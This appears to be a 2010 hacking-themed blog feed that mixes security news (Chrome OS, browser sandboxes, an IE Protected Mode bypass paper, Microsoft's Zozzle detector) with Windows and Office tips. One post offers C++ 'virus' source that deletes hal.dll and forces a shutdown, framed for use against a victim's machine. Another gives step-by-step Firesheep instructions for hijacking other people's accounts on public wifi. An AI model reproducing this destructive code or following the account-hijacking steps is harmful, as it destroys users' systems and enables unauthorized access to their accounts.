"Operating systems today are centered on the idea that applications can be trusted to modify the system, and that users can be trusted to install applications that are trustworthy," he says, "it turns out those are bad assumptions."

In contrast, Chrome OS assumes that applications and users can't be trusted. And it has just one application: the browser. "There's a cascade of things that happen when you make this core assumption," says Linus Upson, a Google VP of engineering working on the project, from making it easier to protect against malware, to reducing the need for users to act as administrator for their own system.
Chrome OS—based on a pared-down version of the Linux operating system—automatically downloads and installs its own updates. Any data downloaded in the course of using the Web is kept carefully in a secure place, separate from the OS.
Google still needs to prove that the simplicity of Chrome OS doesn't undo its usefulness. To this end, it has built a Web "app store" to encourage developers to create Web-based software that will match the diversity and functionality of the applications that can be installed on the hard drive of a Windows or Mac computer. These apps are basically advanced websites that offer similar functionality to desktop apps software.
Users of Chrome OS—as well as the Chrome browser on a conventional computer—can search or browse the Chrome Web Store and with a single click install apps. The store has far fewer software applications than are available for a conventional machine. But some Chrome apps can compete with more traditional, desktop applications, for example a Photoshop-like image editor, Aviary.
Pichai says the fact the app store takes payments—either one off or subscriptions—should stimulate the creation of apps that otherwise wouldn't exist because developers couldn't make them profitable. "I wouldn't find a random game on a website and give them my credit card details to pay $3.99. It's not worth the time or the risk."
Somewhat surprisingly, given Google's claimed commitment to the open Web, Google's app store is not compatible with other Web browsers. But it is possible to easily modify apps developed for Chrome's store for other "modern" browsers, says Pichai, since they use HTML5 and other web standards designed to enable advanced functionality, including working while offline. The latest versions of Internet Explorer, and other browsers, support those standards. However some features of Chrome apps remain exclusive to Chrome, such as 3-D effects that tap into a machine's graphics processor. "We need to make sure that apps can do everything that apps can do on the desktop today," Pichai explains. He expects other browsers to catch up as HTML5 and other new Web standards become more common.

Google Chrome OS

noreply@blogger.com (Unknown) — Sat, 11 Dec 2010 07:17:00 +0000

"Google's Chrome OS chiefs explain in Technology Review how most of the web-only OS's features flow from changing one core assumption of previous operating system designs. 'Operating systems today are centered on the idea that applications can be trusted to modify the system, and that users can be trusted to install applications that are trustworthy,' says Google VP Sundar Pichai. Chrome doesn't trust applications, or users — and neither can modify the system. Once users are banned from installing applications, or modifying the system security, usability, and more are improved, the Googlers claim."

If you use your computer mainly to browse Internet, then Google Chrome OS is for you.
The browser takes care of all the programs in your computer.

Google Adds Flash Sandbox to Chrome Browser

noreply@blogger.com (Unknown) — Sat, 04 Dec 2010 14:11:00 +0000

Two weeks after releasing Reader X with its new sandbox security mechanism, Adobe has teamed up with Google to enable a sandboxed version of its Flash software to run in Google Chrome.

The two companies said on Wednesday that Google has released a version of Chrome to its developer channel that includes the sandboxed Flash player. Google and Adobe have been working together on sandboxing technology for several months now, and this is the first result of that collaboration. The current release of Chrome with the sandboxed Flash software runs on Windows XP, Vista and Windows 7. The sandbox used for Flash is slightly different from the original Chrome sandbox, Google said.

"This initial Flash Player sandbox is an important milestone in making Chrome even safer. In particular, users of Windows XP will see a major security benefit, as Chrome is currently the only browser on the XP platform that runs Flash Player in a sandbox. This first iteration of Chrome’s Flash Player sandbox for all Windows platforms uses a modified version of Chrome’s existing sandbox technology that protects certain sensitive resources from being accessed by malicious code, while allowing applications to use less sensitive ones. This implementation is a significant first step in further reducing the potential attack surface of the browser and protecting users against common malware," Google's Justin Schuh and Carlos Pizano said in a blog post explaining the Flash sandbox in Chrome.

Google and Adobe officials said that they expect to extend the availability of Chrome with the Flash sandbox to other platforms in the near future, although no time table was specified. Sandboxes have become an important defense mechanism for software makers in the last year or so as they have sought to prevent attackers from using browser-based and PDF-based exploits to jump from vulnerable applications to other apps or the operating system. Microsoft introduced a modified sandbox with Internet Explorer Protected Mode in Vista and Google included a sandbox in Chrome in 2008.

Adobe officials said they expect some changes to the Flash Chrome sandbox as things progress.

"Over the next few months, we will be testing and receiving feedback on this project. Since this is a distinctly different sandboxing code base from Internet Explorer, we are essentially starting from scratch. Therefore, we still have a few bugs that we are working through. We hope that we can use this experience as a platform for discussing sandbox approaches with the other browser vendors," Adobe's Peleus Uhley said in a post about the Flash sandbox.

"The Flash Player team and the Adobe Secure Software Engineering Team (ASSET) are excited to explore this area as an additional defense for protecting our end-users. In addition to sandboxes, we are moving forward in parallel with other Flash Player defenses, such as JIT spraying mitigations."

Adobe Releases Reader X With Sandbox

noreply@blogger.com (Unknown) — Sat, 04 Dec 2010 13:52:00 +0000

Adobe has released the much anticipated new version of its Reader software, Adobe Reader X, which includes the new sandboxing feature meant to prevent exploits against the software from affecting other applications on a PC.

The new version of Reader, one of the more widely deployed applications anywhere, is designed to be a major step forward in security for Adobe customers, many of whom have been critical of the company's recent security track record. The company has been public about its efforts to change that track record and began talking about the upcoming inclusion of a sandbox in Reader several months ago.

The sandbox is a way for the Reader application to prevent malicious code from using a vulnerability in the software to jump from Reader to another application or the operating system itself. Adobe officials said that the sandbox in Reader X isn't meant as a panacea, but is one link in a chain of technologies and methods that the company is using to help improve the quality and security of its products.

"Over the last few months, the Adobe Reader engineering team together with the Adobe Secure Software Engineering Team, partners in the software development community such as the Microsoft Office security team and the Chrome team at Google, as well as customers, third-party consultancies in the security community, and other external stakeholders were hard at work to help ensure the sandbox implementation was as robust as possible," Brad Arkin, Adobe's director of product security and privacy, wrote in a blog post on Reader X.

"Adobe’s product security initiatives are focused on reducing both the frequency and the impact of security vulnerabilities. Adobe Reader Protected Mode represents an exciting new advancement in mitigating the impact of attempted attacks. While sandboxing is not a security silver bullet, it provides a strong additional level of defense against attacks. Even if exploitable security vulnerabilities are found by an attacker, Adobe Reader Protected Mode will help prevent the attacker from writing files or installing malware on potential victims’ computers."

Sandboxes have become a popular and useful tool for software vendors that are looking for ways to prevent their applications from becoming vectors for larger attacks on users' machines. The most notable example outside of Reader X is Google Chrome, which has included a sandbox feature since 2008. And Microsoft's Internet Explorer has a similar feature in Protected Mode.

Adobe Reader has been a major target for attackers in the last couple of years, and a number of high-profile critical bugs have plagued the application of late. Most recently, Adobe was forced to issue an emergency patch for Reader this week to fix several critical bugs.

Researchers Bypass Internet Explorer Protected Mode

noreply@blogger.com (Unknown) — Sat, 04 Dec 2010 13:32:00 +0000

"A new paper from researchers at Verizon Business identifies a method through which an attacker can bypass Internet Explorer Protected Mode and gain elevated privileges once he's successfully exploited a bug on the system. Protected Mode in Internet Explorer is one of a handful of key security mechanisms that Microsoft has added to Windows in the last few years.

It is often described as a sandbox, in that it is designed to prevent exploitation of a vulnerability in the browser from leading to more persistent compromise of the underlying system. In their research, the Verizon Business team found a method that, when combined with an existing memory-corruption vulnerability in the browser, enables an attacker to bypass Protected Mode and elevate his privileges on the compromised machine (PDF). The technique enables the attacker to move from a relatively un-privileged level to one with higher privileges, giving him complete access to the logged-in user's account."

The key method through which IE Protected Mode mitigates exploitation of browser bugs is by running many processes in low-integrity mode with very low privileges on the machine. The idea is that even if an attacker is able to exploit a vulnerability and get onto a machine, his code will not be able to do anything of consequence on the PC. However, not all sites and processes are treated equally in Protected Mode.

"Through the hooking of the low integrity Internet Explorer process, the Protected Mode API exposed by the Internet Explorer broker process and other application compatibility techniques, a large number of in-process Internet Explorer extension work in low integrity without modification. However, other more complicated add-ins and applications require modification. As a result of this incompatibility and Microsoft’s dedication to backwards compatibility, not all Internet Explorer zones render their member sites in Protected Mode. Each Internet Explorer zone defines a set of security policies for pages rendered in that zone and enabling Protected Mode is one of the available settings," researchers at Verizon Business wrote in their paper, "Escaping From Microsoft's Protected Mode Internet Explorer."

In their research, the Verizon Business team found a method that, when combined with an existing memory-corruption vulnerability in the browser, enables an attacker to bypass Protected Mode and elevate his privileges on the compromised machine. The technique enables the attacker to move from a relatively un-privileged level to one with higher privileges, giving him complete access to the logged-in user's account.

"The attack assumes the existence of exploitable memory corruption vulnerability within Internet Explorer or an extension, which is the precise scenario that Protected Mode is supposed to mitigate. Once the initial remote exploit has been used to execute arbitrary code at low integrity on the client, the payload can create a web server listening on any port on the loopback interface, even as a limited user at low integrity. The web server should be able to serve-up the original exploit that allowed remote exploitation in the first instance. Since the exploit will now be launched from the same machine, exploitation can be made significantly more reliable as Address Space Layout Randomisation (ASLR) is no longer effective and other exploitation techniques can be used with higher probabilities of success," the paper says. "The browser can be instructed to navigate to this new malicious web server using the IELaunchUrl() function, which is callable from low integrity as part of the Protected Mode API. This will cause a new tab to be launched which will navigate to “http://localhost/exploit.html” or similar.

The new malicious web page will be rendered in the Local Intranet Zone and the rendering process will now be executing at medium integrity. By exploiting the same vulnerability a second time, arbitrary code execution can now be achieved as the same user at medium integrity. This provides full access to the user’s account and allows malware to be persisted on the client, something which was not possible from low integrity whilst in Protected Mode." Other vendors have adopted the sandboxing technique recently, specifically Adobe, which added a sandbox to Reader X. Google also put a sandbox in Chrome several years ago and this week announced that it is adding a sandboxed version of Adobe Flash to future versions of Chrome.

Microsoft Builds Javascript Malware Detection Tool

noreply@blogger.com (Unknown) — Sat, 04 Dec 2010 13:05:00 +0000

"As browser-based exploits and specifically JavaScript malware have shouldered their way to the top of the list of threats, browser vendors have been scrambling to find effective defenses to protect users. Few have been forthcoming, but Microsoft Research has developed a new tool called Zozzle that can be deployed in the browser and can detect JavaScript-based malware on the fly at a very high effectiveness rate.

Zozzle is designed to perform static analysis of JavaScript code on a given site and quickly determine whether the code is malicious and includes an exploit. In order to be effective, the tool must be trained to recognize the elements that are common to malicious JavaScript, and the researchers behind it stress that it works best on de-obfuscated code."

In the paper, the researchers say that they trained Zozzle by crawling millions of Web sites and using a similar tool, called Nozzle, to process the URLs and see whether malware was present. "ZOZZLE makes use of a statistical classifier to efficiently identify malicious JavaScript. The classifier needs training data to accurately classify JavaScript source, and we describe the process we use to get that training data here. We start by augmenting the JavaScript engine in a browser with a “deobfuscator” that extracts and collects individual fragments of JavaScript.

As discussed above, exploits are frequently buried under multiple levels of JavaScript eval. Unlike Nozzle, which observes the behavior of running JavaScript code, ZOZZLE must be run on an unobfuscated exploit to reliably detect malicious code," the researchers wrote in a paper written on Zozzle by Benjamin Livshits and Benjamin Zorn of Microsoft Research, Christian Seifert of Microsoft and Charles Curtsinger of the University of Massachusetts at Amherst.

The researchers say that Zozzle is specifically designed to detect and defend against heap-spraying exploits launched by malicious JavaScript found on Web sites. In many cases these days, that kind of exploit is hosted on a legitimate site that's been compromised and is being used as part of a drive-by download attack. Often, the code is hosted on a specific page for a day or even a few hours and then is taken down, either by the attacker or the site owner. The Microsoft researchers say that this, along with the multiple layers of obfuscation that attackers use to cloak JavaScript exploits, can make it difficult for automated tools to identify such malware with a high degree of accuracy. The approach that they take with Zozzle is a multi-stage one.

"Once we have labeled JavaScript contexts, we need to extract features from them that are predictive of malicious or benign intent. For ZOZZLE, we create features based on the hierarchical structure of the JavaScript abstract syntax tree (AST). Specifically, a feature consists of two parts: a context in which it appears (such as a loop, conditional, try/catch block, etc.) and the text (or some substring) of the AST node," the paper says. "For a given JavaScript context, we only track whether a feature appears or not, and not the number of occurrences. To efficiently extract features from the AST, we traverse the tree from the root, pushing AST contexts onto a stack as we descend and popping them as we ascend."

The new tool is still in the research phase and it's not clear when or if Microsoft Research might release Zozzle. But the researchers say that Zozzle has an extremely low overhead when deployed in a browser--on the order of 2-5 milliseconds per JavaScript file--and has a false-positive rate of less than one percent.

"Much of the novelty of ZOZZLE comes from its hooking into the JavaScript engine of a browser to get the final, expanded version of JavaScript code to address the issue of deobfuscation. Compared to other classifier-based tools, ZOZZLE uses contextual information available in the program Abstract Syntax Tree (AST) to perform fast, scalable, yet precise malware detection," the researchers write in the paper. "We see tools like ZOZZLE deployed both in the browser to provide “first response” for users affected by JavaScript malware and used for offline dynamic crawling, to contribute to the creation and maintenance of various blacklists."

How to add Command Prompt to the Right Click ?

noreply@blogger.com (Unknown) — Tue, 30 Nov 2010 19:43:00 +0000

I love command prompt. Do you ?? I bet, a great hacker always love to be on Command Prompt so am I, although I am not a great hacker, but still, I love it.

Wanna see the Command Prompt in action on every Right Click ??? Let’s get busy..

For this, we gotta gear up our tools to tweak the Windows Registry. Oh Ya.. I love to modify every value of registry, coz its my machine.

Follow the steps:

Step 1: Go to Start > Run > Type regedit

Step 2: Check out the location

[HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here]

Step 3: Create an entry

@=”Command &Prompt Here”

Step 4: Now, lets go to the location

[HKEY_CLASSES_ROOT\Directory\shell\CommandPromptHere\command]

Step 5: Make an entry

@=”cmd.exe /k cd %1 “

Here we go. Do we need to click on Save.. Oh No.. there is no button to click on save.. Just close the Registry and enjoy Command Prompt on every Right Click you make.

Happy Hacking.

How to Remove All Hyperlinks in Word or Excel ?

noreply@blogger.com (Unknown) — Tue, 30 Nov 2010 19:38:00 +0000

These two nifty macros enable you to delete the embedded hyperlinks that are generated when typing URLS or copying information from the web

Ever copy and paste something from the Internet and then into Word only to get the hyperlinks embedded? You can removed them easily with the Macros below.

Microsoft Word

Hit [ALT]+ [F11] to open the Visual Basic Editor

Go to “Insert” > “Module” and in the pop-up window copy:

Sub RemoveHyperlinks()
Dim oField As Field
For Each oField In ActiveDocument.Fields
If oField.Type = wdFieldHyperlink Then
oField.Unlink
End If
Next
Set oField = Nothing
End Sub

Then click “File” > Close and return to Microsoft Word

You can now run the Macro in Word by going to:

Tools > Macro > Macro and then Run “RemoveAllHyperlinks”

Microsoft Excel:

You can do the same in an Excel Document:

Hit [ALT]+[F11] to open the Visual Basic Editor

Go to “Insert” > “Module” and in the pop-up window copy:

Sub RemoveHyperlinks()
'Remove all hyperlinks from the active sheet
ActiveSheet.Hyperlinks.Delete
End Sub

Then click “File” > Close and return to Microsoft Excel

You can now run the Macro in Excel by going to:

Tools > Macro > Macro and then Run “RemoveAllHyperlinks”, this will delete all URLS on the selected worksheet.

Powerful C++ Virus

noreply@blogger.com (Anonymous) — Sat, 20 Nov 2010 15:55:00 +0000

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

NOTE: FOR EDUCATIONAL PURPOSE ONLY.WE ARE NOT RESPONSIBLE FOR ANY FURTHER CONSEQUENCES. BE ETHICAL AND THINK LIKE A HUMAN...

Warning: Do not try this on your home computer.
The Original Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
//BE SURE TO TAKE HEX#1 - HACKER'S EXAM...

std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

BE SURE TO TAKE HEX#1 - HACKER'S EXAM...

HEX #1 - HACKERS EXAM

noreply@blogger.com (Unknown) — Thu, 11 Nov 2010 06:42:00 +0000

The HEX #1 started now

RULES:
1. TRY ON YOUR OWN.
2. SEND YOUR ANSWERS IN A PDF/DOC FILE.
3. YOUR FILE MUST HAVE THE FOLLOWING DETAILS: YOUR COMPLETE NAME, YOUR
    OCCUPATION IF STUDENT THE COLLEGE, DEPARTMENT AND YEAR HAVE TO BE
    MENTIONED.
4. YOUR DOCUMENT SHOULD BE NEAT AND SIMPLE.
5. YOUR DOCUMENT SHOULD ALSO HAVE YOUR EMAIL-ID
6. ONE CAN SEND THEIR DOCUMENT ANY NUMBER OF TIMES.BUT THE ONE SEND AT
     LAST WILL BE TAKEN IN TO ACCOUNT.
7. Event duration is 15 days
8. YOU HAVE TO MAIL YOUR ANSWERS on or before 26th November 2010 12:00 noon to hackinverse@gmail.com
9. No e-mail will be accepted after the specified time.

Hex #1

You can also download the pdf file here:

SOFTW4R3 UPD4T3 FOR W33K #2

noreply@blogger.com (Anonymous) — Tue, 09 Nov 2010 08:17:00 +0000

Google To Compete Facebook with GoogleMe!

Just when people have started loosing interest from Orkut and most of them have shifted to Facebook the two internet Giants, it appears that Google will attempt to pull the ground from under Facebook's feet, by launching a new social networking service of its own called "Google Me" and simultaneously rope in the famed services of Zynga, the social gaming developer of Facebook fame. This news comes after TechCrunch's reports that Google has pumped in between $100m to $200m into Zyngya.

Do you have questions, comments, or suggestions? Feel free to post a comment!

Dipostable.com - Dispostable email account !

noreply@blogger.com (Anonymous) — Tue, 09 Nov 2010 08:06:00 +0000

Friends today I am going to tell you about an amazing website. Many of you don't like so much spam e-mail after you register for any website. But you have to give your email address & tolerate spam if you want to register. But dipostable.com is a great website. You don't need to create your email account here. Just give any name to email account.for eg: 123@dispostable.com and open it. So no need to register or tolerate with spam mail. Just while registering on any website give any name to your email address name@dispostable.com then go to dispostable.com and just give that name and open its mail account! Amazing isn't it?

Didn't go it? Visit www.dispostable.com and you will understand everything!

Do you have questions, comments, or suggestions? Feel free to post a comment!

Firesheep Makes Facebook Hacking Easy

noreply@blogger.com (Anonymous) — Tue, 09 Nov 2010 06:45:00 +0000

Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account

What is Session Hijacking?

In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:

Public wifi access
winpcap
Firesheep(Download)

Method

1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser

2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep

3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly

Hope you liked the post! Pass the comments

Farm Ville Bot

noreply@blogger.com (Unknown) — Fri, 05 Nov 2010 12:35:00 +0000

Farmville

This is the Farm Ville Bot all of you are waiting for
For any more queries regarding its usage, just message me in Facebook and visit the page and click LIKE on it

It is absolutely free.
Don't forget to read the README File
Enjoy
:-)

Rapidshare Link
Megaupload Link
Hotfile Link
MediaFire Link

SOFTW4R3 UPD4T3 FOR W33K #1

noreply@blogger.com (Anonymous) — Mon, 01 Nov 2010 10:01:00 +0000

Facebook bought drop.io - File sharing will be the next Facebook feature

Facebook number one social networking website bought drop.io and closing down file sharing service by 15th of December. Facebook is really good at sharing picture but not the media files. This will make them strong in real time file sharing as well.
drop.io blog announced that most their service and assets including Sam Lessin were bought by Facebook.

"Today, we’re proud to announce that we’ve struck a deal with Facebook. What this means is that Facebook has bought most of drop.io’s technology and assets, and Sam Lessin is moving to Facebook."

In the coming weeks, drop.in will be winding down the their service. As of this week, people will no longer be able to create new free drops, but you’ll be able to download content from existing drops until Dec. 15. Paid user accounts will still be available through Dec. 15 and paid users will be able to continue using the service normally. After Dec. 15, paid accounts will be discontinued as well.

Please download your information before Dec. 15 – they plan to delete it after that time. No user data or content will be transferred to Facebook.

Soon you will be able to experience similar services from Facebook. We are still not sure is it going to be a free service or a paid service or what exactly Facebook plans with drop.io